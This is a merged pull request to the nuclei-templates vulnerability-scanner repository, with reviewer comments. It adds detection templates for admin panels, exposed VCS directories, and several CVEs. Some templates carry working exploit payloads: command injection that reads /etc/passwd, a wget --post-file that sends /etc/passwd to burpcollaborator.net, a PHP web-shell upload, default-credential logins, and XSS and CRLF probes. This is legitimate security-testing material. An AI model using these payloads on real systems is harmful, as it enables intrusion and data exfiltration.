Merge pull request #24 from projectdiscovery/master

Update
patch-1
Dhiyaneshwaran 2021-03-05 01:58:49 +05:30 committed by GitHub
commit b349e4aa0c
27 changed files with 505 additions and 23 deletions


@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts | Templates | Counts |
| -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ |
| cves | 218 | vulnerabilities | 104 | exposed-panels | 90 |
| exposures | 55 | technologies | 47 | misconfiguration | 49 |
| workflows | 23 | miscellaneous | 16 | default-logins | 16 |
| cves | 221 | vulnerabilities | 105 | exposed-panels | 95 |
| exposures | 60 | technologies | 50 | misconfiguration | 50 |
| workflows | 23 | miscellaneous | 16 | default-logins | 17 |
| exposed-tokens | 9 | dns | 6 | fuzzing | 4 |
| helpers | 2 | takeovers | 1 | - | - |
**68 directories, 653 files**.
**69 directories, 672 files**.
</td>
</tr>


@ -27,3 +27,4 @@ requests:
- "</password>"
- "DEVICE.ACCOUNT"
part: body
condition: and


@ -23,12 +23,19 @@ requests:
matchers-condition: and
matchers:
- type: regex
regex:
- "uid(.*)"
- "gid(.*)"
part: body
- type: word
words:
- "uid="
- "gid="
- "groups="
condition: and
part: body
- type: word
words:
- text/plain
part: header
- type: status
status:
- 200


@ -9,14 +9,14 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/webapp/?fccc0\"><script>alert(1)</script>5f43d=1"
- '{{BaseURL}}/webapp/?fccc%27\%22%3E%3Csvg/onload=alert(xss)%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "\"><script>alert(1)</script>"
- "<svg/onload=alert(xss)>"
- type: word
part: header
words:


@ -11,7 +11,7 @@ info:
3.0.2, 3.1.0, 4.0.0-alpha has one restful api which exposed
Kylin's configuration information without any authentication,
so it is dangerous because some confidential information entries will be disclosed to everyone.
reference: ttps://nvd.nist.gov/vuln/detail/CVE-2020-13937
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-13937
tags: cve,cve2020,apache
# References:
@ -29,13 +29,15 @@ requests:
- type: status
status:
- 200
- type: word
words:
- "application/json"
condition: and
part: header
- type: word
words:
- "config"
- config
- kylin.metadata.url
condition: and
part: body
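Review bot: The new body matcher quotes `"application/json"` but leaves the neighbouring list entries `- config` and `- kylin.metadata.url` unquoted, and the line it replaced (`- "config"`) was quoted; pick one quoting style for word lists within the file. Both plain scalars parse as strings here, so this is a style point only. The enclosing matcher list starts in the hunk but the `requests` entry it belongs to begins outside it.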


@ -9,13 +9,13 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/control/stream?contentId=<svg/onload=alert(1)>'
- '{{BaseURL}}/control/stream?contentId=%27\%22%3E%3Csvg/onload=alert(xss)%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<svg/onload=alert(1)>"
- "<svg/onload=alert(xss)>"
part: body
- type: word


@ -0,0 +1,26 @@
id: CVE-2020-21224
info:
name: Inspur ClusterEngine V4.0 RCE
author: pikpikcu
severity: critical
reference: https://github.com/NS-Sp4ce/Inspur/tree/master/ClusterEngineV4.0%20Vul
tags: cve,cve2020,clusterengine,rce
requests:
- method: POST
path:
- '{{BaseURL}}/login.php'
body: "op=login&username=;`cat /etc/passwd`&password="
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
part: body
- type: status
status:
- 200
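Review bot: The `info` block of this new template carries `name`, `author`, `severity`, `reference` and `tags` but no `description`, unlike the Laravel template edited in the same PR, so a reader cannot tell from the template what product behaviour is being checked without following the reference link. Add a one-line `description:` stating the affected product/version and that the check reads a response body marker from the login endpoint. On the regex line, `root:[x*]:0:0` uses a character class rather than an alternation; it does match both `root:x:0:0` and `root:*:0:0` since each alternative is a single character, but a short comment saying so would stop the next reader from "fixing" it.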


@ -0,0 +1,34 @@
id: CVE-2021-21315
info:
name: Node.js Systeminformation Command Injection
author: pikpikcu
severity: high
reference: https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC
tags: nodejs,cve,cve2021
requests:
- method: GET
path:
- "{{BaseURL}}/api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20burpcollaborator.net)"
matchers-condition: and
matchers:
- type: word
words:
- "application/json"
part: header
- type: word
words:
- "wget --post-file /etc/passwd burpcollaborator.net"
- name
- running
- pids
part: body
condition: and
- type: status
status:
- 200
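Review bot: The body matcher on `- "wget --post-file /etc/passwd burpcollaborator.net"` only confirms that the injected `name[]` value is echoed back in the JSON service listing next to `name`, `running` and `pids`; it does not establish that anything was executed, so the template will report a finding on any build that reflects the parameter, patched or not. At the same time, on a host where the injection does execute, the payload posts the host's /etc/passwd to `burpcollaborator.net`, a domain the scan operator does not control, which is data leaving the target to an unrelated third party. Replace the payload with a side-effect-free marker whose effect can be observed in the response, and document in `description:` what the matcher actually proves; as written the `severity: high` result is reflection-only.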


@ -0,0 +1,29 @@
id: CVE-2021-27132
info:
name: CRLF Injection - Sercomm VD625
author: geeknik
severity: medium
description: Sercomm AGCOMBO VD625 Smart Modems with firmware version AGSOT_2.1.0 are vulnerable to CRLF Injection via the Content-Disposition header - https://cybertuz.com/blog/post/crlf-injection-CVE-2021-27132
tags: cve,cve2021,crlf
requests:
- method: GET
path:
- "{{BaseURL}}/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20example.com%0d%0aX-XSS-Protection:0"
matchers-condition: and
matchers:
- type: status
status:
- 404
part: header
- type: word
words:
- "Content-Disposition: attachment;filename=test.txt"
- "Set-Cookie:CRLFInjection=Test"
- "Location: example.com"
- "X-XSS-Protection:0"
part: header
condition: and
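Review bot: The `part: header` line under the `type: status` matcher (`status: - 404`) does not appear to do anything, since status matchers compare the response code rather than a response part; drop it so the matcher reads the same as the status matchers elsewhere in this PR. The reference URL is also embedded at the end of `description:`; the other templates in this PR put it in its own field, so move it to `reference: https://cybertuz.com/blog/post/crlf-injection-CVE-2021-27132` and end the description at "Content-Disposition header".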


@ -1,10 +1,10 @@
id: CVE-2021-3129
info:
name: Ignition Laravel RCE
name: LARAVEL <= V8.4.2 DEBUG MODE - REMOTE CODE EXECUTION
author: z3bd
severity: critical
description: Detect Ignition before 2.5.2, as used in Laravel, allows unauthenticated RCE.
description: Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.
reference: https://www.ambionics.io/blog/laravel-debug-rce
tags: cve,cve2021,laravel,rce
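Review bot: The new `name:` is written in capitals (`LARAVEL <= V8.4.2 DEBUG MODE - REMOTE CODE EXECUTION`) while every other template touched in this PR uses title case, so it will stand out in listings and reports. Suggest `name: Laravel <= 8.4.2 Debug Mode - Remote Code Execution`, keeping the version bound the new description already states. The expanded description itself is a clear improvement over the old one-liner.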


@ -0,0 +1,27 @@
id: alibaba-canal-default-password
info:
name: Alibaba Canal Default Password
author: pdteam
severity: high
tags: alibaba,dlogin
requests:
- method: POST
path:
- "{{BaseURL}}/api/v1/user/login"
headers:
Content-Type: application/json
body: |
{"username":"admin","password":"123456"}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'data":{"token"'
- '"code":20000'
condition: and


@ -44,7 +44,7 @@ requests:
- j5Brn9
- tomcat
attack: clusterbomb # Available options: sniper, pitchfork and clusterbomb
attack: pitchfork # Available options: sniper, pitchfork and clusterbomb
raw:
# Request with simple param and header manipulation with DSL functions
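Review bot: Switching `attack: clusterbomb` to `attack: pitchfork` changes the meaning of the two payload lists: as far as I can tell pitchfork pairs entry i of one list with entry i of the other instead of trying every combination, so lists of unequal length are silently truncated to the shorter one. The payload lists begin outside this hunk, so their lengths cannot be checked here; the commit message does not say why the mode changed. Make the pairing explicit in the inline comment, e.g. `attack: pitchfork # username[i] is paired with password[i]; keep both lists the same length`.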


@ -0,0 +1,23 @@
id: acunetix-panel-detect
info:
name: Acunetix Panel detector
author: joanbono
severity: info
requests:
- method: GET
path:
- "{{BaseURL}}/#/login"
headers:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
matchers-condition: and
matchers:
- type: word
words:
- '<title>Acunetix</title>'
- '<acx-root></acx-root>'
part: body
- type: status
status:
- 200
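Review bot: The path `"{{BaseURL}}/#/login"` contains a URL fragment, and fragments are not transmitted in HTTP requests, so unless nuclei treats `#` specially the request actually sent is for `{{BaseURL}}/` and the `<title>Acunetix</title>` / `<acx-root></acx-root>` matchers are being applied to the root page. Write the path as what is really requested, `- "{{BaseURL}}/"`, or add a comment explaining that the client-side route is deliberate, so the next reader does not assume a `/login` resource is being probed.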


@ -0,0 +1,18 @@
id: checkmarx-panel-detect
info:
name: Checkmarx WebClient detector
author: joanbono
severity: info
requests:
- method: GET
path:
- "{{BaseURL}}/cxwebclient/Login.aspx"
headers:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
matchers:
- type: word
words:
- '/CxWebClient/webApp/Scripts/libs/authenticationScripts'
part: body


@ -0,0 +1,18 @@
id: hmc-hybris-panel
info:
name: SAP Hybris Management Console
author: dogasantos
severity: info
requests:
- method: GET
path:
- "{{BaseURL}}/hmc/hybris"
- "{{BaseURL}}/hybris/hmc/hybris"
matchers:
- type: word
words:
- "hybris Management Console"
part: body


@ -0,0 +1,26 @@
id: nessus-panel-detect
info:
name: Nessus Panel detector
author: joanbono
severity: info
requests:
- method: GET
path:
- "{{BaseURL}}/server/status"
headers:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
matchers-condition: and
matchers:
- type: word
words:
- '{"code":200,"progress":null,"status":"ready"}'
part: body
- type: word
words:
- 'NessusWWW'
part: header
- type: status
status:
- 200


@ -0,0 +1,25 @@
id: exposed-bitkeeper
info:
name: Exposed BitKeeper Directory
author: daffainfo
severity: low
reference: https://www.bitkeeper.org/man/config-etc.html
requests:
- method: GET
path:
- "{{BaseURL}}/BitKeeper/etc/config"
matchers-condition: and
matchers:
- type: word
words:
- "logging"
- "email"
- "description"
condition: and
- type: status
status:
- 200
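Review bot: The word matcher for `/BitKeeper/etc/config` requires only `logging`, `email` and `description` to appear in the body, and all three are ordinary English words that a catch-all HTML page returning 200 is likely to contain, so the `condition: and` gives little protection against false positives. If the config format in the linked reference writes these as `key: value` lines, matching the keys with their colon (`"logging:"`, `"email:"`, `"description:"`) would be far more specific; alternatively add a header matcher excluding `text/html` responses, as the Joomla template in this PR does with `text/plain`.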


@ -0,0 +1,24 @@
id: exposed-bzr
info:
name: Exposed BZR Directory
author: daffainfo
severity: low
reference: http://doc.bazaar.canonical.com/beta/en/user-reference/configuration-help.html
requests:
- method: GET
path:
- "{{BaseURL}}/.bzr/branch/branch.conf"
matchers-condition: and
matchers:
- type: word
words:
- "parent_location"
- "push_location"
condition: and
- type: status
status:
- 200


@ -0,0 +1,22 @@
id: exposed-darcs
info:
name: Exposed Darcs Config
author: daffainfo
severity: low
reference: http://darcs.net/Using/Configuration#sources
requests:
- method: GET
path:
- "{{BaseURL}}/_darcs/prefs/binaries"
matchers-condition: and
matchers:
- type: word
words:
- "Binary file regexps"
- type: status
status:
- 200


@ -0,0 +1,22 @@
id: exposed-hg
info:
name: Exposed HG Directory
author: daffainfo
severity: low
requests:
- method: GET
path:
- "{{BaseURL}}/.hg/hgrc"
matchers:
- type: word
words:
- "[paths]"
- "default"
condition: and
- type: status
status:
- 200
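Review bot: This template lists two matchers (a word matcher for `[paths]`/`default` and a status matcher for 200) but has no `matchers-condition`, and nuclei evaluates multiple matchers with `or` when the key is omitted, so a 200 response alone is enough to report `/.hg/hgrc` as exposed on any host with a catch-all route. The sibling `exposed-bzr` and `exposed-bitkeeper` templates in this PR set it explicitly; add `matchers-condition: and` above `matchers:` here as well.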


@ -0,0 +1,30 @@
id: joomla-config-dist-file
info:
name: Joomla Config Dist File
author: oppsec
severity: low
description: configuration.php-dist is a file created by Joomla to save Joomla settings.
requests:
- method: GET
path:
- "{{BaseURL}}/configuration.php-dist"
matchers-condition: and
matchers:
- type: word
words:
- "Joomla"
- "JConfig"
- "@package"
condition: and
- type: word
words:
- "text/plain"
part: header
- type: status
status:
- 200


@ -2,7 +2,7 @@ id: phpinfo-files
info:
name: phpinfo Disclosure
author: pd-team
author: pd-team & daffainfo
severity: low
requests:
@ -21,8 +21,10 @@ requests:
- "{{BaseURL}}/time.php"
- "{{BaseURL}}/index.php"
- "{{BaseURL}}/temp.php"
- "{{BaseURL}}/PHPInfo.php"
- "{{BaseURL}}/old_phpinfo.php"
- "{{BaseURL}}/infos.php"
- "{{BaseURL}}/linusadmin-phpinfo.php"
- "{{BaseURL}}/php-info.php"
matchers:
- type: word
words:


@ -0,0 +1,26 @@
id: burp-rest-api-detect
info:
name: Burp Rest API Server Running
author: joanbono
severity: info
reference: https://portswigger.net/burp/documentation/enterprise/api-reference
requests:
- method: GET
path:
- "{{BaseURL}}/v0.1/"
matchers-condition: and
matchers:
- type: word
words:
- '<title>Burp API</title>'
part: body
- type: word
words:
- 'X-Burp-Version'
part: header
- type: status
status:
- 200


@ -0,0 +1,36 @@
id: ilo-detect
info:
name: HP iLO
author: milo2012
severity: info
description: Version of HP iLO
requests:
- method: GET
path:
- "{{BaseURL}}/xmldata?item=all"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- text/xml
part: header
- type: word
words:
- <RIMP>
- <HSI>
condition: and
extractors:
- type: regex
part: body
group: 1
regex:
- "<FWRI>([0-9.]+)</FWRI>"


@ -0,0 +1,31 @@
id: microsoft-echange-server-detect
info:
name: Microsoft Exchange Server Detect
author: pikpikcu
severity: info
reference: https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange.nse
description: |
Check for Exchange Server CVEs CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065,using Outlook Web App path data.
requests:
- method: GET
path:
- "{{BaseURL}}/owa/auth/logon.aspx"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "(X-Owa-Version:|/owa/auth/15.2.*|/owa/auth/15.1.*|/owa/auth/15.0.*|/owa/auth/14.0.*)"
part: all
extractors:
- type: kval
part: header
kval:
- X-Owa-Version
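Review bot: The template id is misspelled, `id: microsoft-echange-server-detect`; ids are what users pass to `-id`/`-exclude` and reference from workflows, so fix it to `microsoft-exchange-server-detect` before anyone depends on it. The description also overstates what the matchers do: the regex only recognises OWA version families (`/owa/auth/15.2.*`, `15.1`, `15.0`, `14.0`) and the `X-Owa-Version` header, which identifies an Exchange release line, not whether the four listed CVEs are patched, so reword it to say the template fingerprints the Exchange/OWA version for follow-up triage. While there, `data.using` is missing a space and comma after "path data".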


@ -10,7 +10,7 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/email/unsubscribed?email=test@gmail.com%27\%22%3E%3Csvg/onload=alert(1337)%3E'
- '{{BaseURL}}/email/unsubscribed?email=test@gmail.com%27\%22%3E%3Csvg/onload=alert(xss)%3E'
matchers-condition: and
matchers:
- type: status
@ -19,7 +19,7 @@ requests:
- type: word
words:
- "<svg/onload=alert(1337)>"
- "<svg/onload=alert(xss)>"
part: body
- type: word


@ -0,0 +1,53 @@
id: simple-employee-rce
info:
name: Simple Employee Records System 1.0 RCE
author: pikpikcu
severity: critical
reference: https://www.exploit-db.com/exploits/49596
tags: rce
requests:
- raw:
- |
POST /dashboard/uploadID.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------5825462663702204104870787337
Content-Length: 267
DNT: 1
Connection: close
-----------------------------5825462663702204104870787337
Content-Disposition: form-data; name="employee_ID"; filename="poc.php"
Content-Type: image/png
<?php
$cmd=$_GET['cmd'];
system($cmd);
?>
-----------------------------5825462663702204104870787337--
- |
GET /uploads/employees_ids/{{endpoint}}?cmd=cat%20/etc/passwd HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 2
extractors:
- type: regex
name: endpoint
part: body
internal: true
regex:
- '(?:[a-zA-Z0-9+\/])*_poc.php'
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
condition: and
part: body